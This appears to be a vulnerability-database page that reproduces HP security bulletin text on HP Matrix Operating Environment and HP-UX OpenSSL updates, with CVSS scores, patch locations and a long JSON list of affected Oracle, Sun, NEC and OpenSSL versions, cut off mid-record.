CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.
HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location
HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=
HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021
HISTORY Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. These vulnerabilities could be exploited remotely to create a remote Denial of Service (DoS) and other vulnerabilites.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310) CVE-2014-3569 Remote Denial of Service (DoS) CVE-2014-3570 Cryptographic Issues (CWE-310) CVE-2014-3571 Remote Denial of Service (DoS) CVE-2014-3572 Cryptographic Issues (CWE-310) CVE-2015-0204 Cryptographic Issues (CWE-310) SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =OPENSSL11I
HP-UX Release HP-UX OpenSSL depot name
B.11.11 (11i v1) OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2) OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0338", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre 1.7.0 17", "scope": null, "trust": 1.8, "vendor": "oracle", "version": null }, { "model": "capssuite", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v4 to v5.1" }, { "model": "csview", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "/faq navigator" }, { "model": "csview", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "/web questionnaire" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "ver6.0 to ver8.0" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v3.0" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v3.1" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v4.0" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v6.2" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v7.0" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v7.1" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v8.0" }, { "model": "express5800", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "infocage", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "security risk management v1.0.2 to v2.1.4" }, { "model": "istorage", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "a series" }, { "model": "istorage", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "d series" }, { "model": "istorage", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "e series" }, { "model": "istorage", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "m series (nas including options )" }, { "model": "istorage", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "s series" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "ver3.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "ver3.01" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "ver3.02" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "ver3.1" }, { "model": "webotx", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "enterprise edition v4.2 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "uddi registry v1.1 to v7.1" }, { "model": "webotx", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "web edition v4.1 to v6.5" }, { "model": "webotx application server", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "enterprise edition v7.1" }, { "model": "webotx application server", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "enterprise v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "express v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "web edition v7.1 to v8.1" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v6.4 to v9.2" }, { "model": "webotx portal", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "websam", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "jobcenter cl/web r13.1" }, { "model": "websam", "scope": "eq", "trust": 1.6, "vendor": "nec", "version": "jobcenter cl/web r13.2" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0:update 65", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.7.072" }, { "model": "jdk update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.8.025" }, { "model": "jre update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.6.085" }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 45", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.6.085" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.8.025" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.3.5" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.2.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zc" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6.081" }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0:update 75", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0:update 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0:update 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6.081" }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0:update 75", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.840" }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7.072" }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.691" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.8.0:update 5", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.8.0:update 5", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.776" }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 14", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 15", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.581" }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.5.071" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.581" }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.5.075" }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.840" }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.5.075" }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": 